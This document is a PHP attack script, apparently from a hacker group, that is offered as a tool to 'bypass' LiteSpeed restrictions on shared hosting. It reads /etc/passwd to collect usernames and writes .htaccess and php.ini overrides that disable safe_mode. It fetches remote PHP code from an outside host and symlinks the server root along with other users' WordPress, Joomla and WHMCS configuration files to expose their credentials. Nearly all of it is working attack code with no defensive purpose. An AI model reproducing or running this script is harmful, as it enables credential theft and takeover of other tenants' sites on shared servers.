Bypass Litespeed By Mauritania Attacker

1. <!DOCTYPE HTML PUBLIC><head> <title>Bypass Litespeed</title></head><link rel="SHORTCUT ICON"href="http://www.iconj.com/ico/l/m/lma992dr41.ico">
2.  
3. <center> <font color=#00FF00 size=6 face="impact">Litespeed Bypass Priv8 By Mauritania Attacker</font></center>
4.  
5. <body bgColor="BLACK">
6.  
7. <center>><img src="http://oi45.tinypic.com/14kv8qq.jpg"></center>
8.  
9.  
10. <center>
11. <form method=post><font color=#00FF00 size=3 face="arial black">Get users (etc/passwd) for symlink ^_^</font><p>
12. <input type=submit name="usre" value="Extract usernames" /></form></center>
13.  
14.  
15.  
16.  
17.  
18.  
19.  
20. <?php
21. if(isset($_POST['usre'])){
22. ?><form method=post>
23. <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
24. foreach($users as $user)
25. {
26. $str=explode(":",$user);
27. echo $str[0]."\n";
28. }
29.  
30. ?></textarea><br><br>
31. <input type=submit name=su value="Bypass Configs" /></form>
32. <?php } ?>
33. <?php
34. error_reporting(0);
35. echo "<font color=#00FF00 size=2 face=\"comic sans ms\">";
36. if(isset($_POST['su']))
37. {
38. mkdir('Mauritania',0777);
39. $rr = " <Files *.php> \n ForceType application/x-httpd-php4 \n </Files> ";
40. $g = fopen('Mauritania/.htaccess','w');
41. fwrite($g,$rr);
42. $Mauritania = symlink("/","Mauritania/root");
43. $rt="<a href=Mauritania/root><font color=#00FF00 size=3 face=\"comic sans ms\"> Bypassed Successfully ^_^</font></a>";
44. echo "Check link given below for / folder symlink <br><u>$rt</u>";
45.  
46.  
47.  
48.  
49. mkdir('Mauritania',0777);
50. $rr = " safe_mode = Off ";
51. $g = fopen('Mauritania/php.ini','w');
52. fwrite($g,$rr);
53. $Mauritania = symlink("/","Mauritania/root");
54.  
55.  
56.  
57. mkdir('Mauritania',0777);
58. $file = file_get_contents('http://samsungmobileng.com/xs/iniphp.txt');
59. $g = fopen('Mauritania/ini.php', 'w');
60. fwrite($g,$file);
61. fclose($g);
62. $Mauritania = symlink("/","Mauritania/root");
63.  
64.  
65.  
66.  
67.  
68.  
69.  
70.  
71.  
72.  
73.  
74.  
75.  
76. fwrite($f,$r);
77. $consym="<a href=Mauritania/><font color=#00FF00 size=3 face=\"comic sans ms\">configuration files</font></a>";
78. echo "<br>The link given below is for configs path symlink, you can view Configs inside the Source Code <br><u><font color=#00FF00 size=2 face=\"comic sans ms\">$consym</font></u>";
79.  
80.  
81.  
82.  
83.  
84.  
85.  
86.  
87.  
88.  
89.  
90.  
91.  
92.  
93.  
94.  
95.  
96.  
97. $usr=explode("\n",$_POST['user']);
98. $configuration=array("wp-config.shtml","wordpress/wp-config.shtml","configuration.shtml","blog/wp-config.shtml","joomla/configuration.shtml","vb/includes/config.shtml","includes/config.shtml","conf_global.shtml","inc/config.shtml","config.shtml","Settings.shtml","sites/default/settings.shtml","whm/configuration.shtml","whmcs/configuration.shtml","support/configuration.shtml","whmc/WHM/configuration.shtml","whm/WHMCS/configuration.shtml","whm/whmcs/configuration.shtml","support/configuration.shtml","clients/configuration.shtml","client/configuration.shtml","clientes/configuration.shtml","cliente/configuration.shtml","clientsupport/configuration.shtml","billing/configuration.shtml","admin/config.shtml");
99. foreach($usr as $uss )
100. {
101. $us=trim($uss);
102.  
103. foreach($configuration as $c)
104. {
105. $rs="/home/".$us."/public_html/".$c;
106. $r="Mauritania/".$us." .. ".$c;
107. symlink($rs,$r);
108.  
109. }
110.  
111. }
112.  
113.  
114. }
115.  
116.  
117.  
118. ?>
119.  
120. Greetz : AnonGhost - Mauritania HaCker Team - X-Blackerz INC - Anonymous - ZHC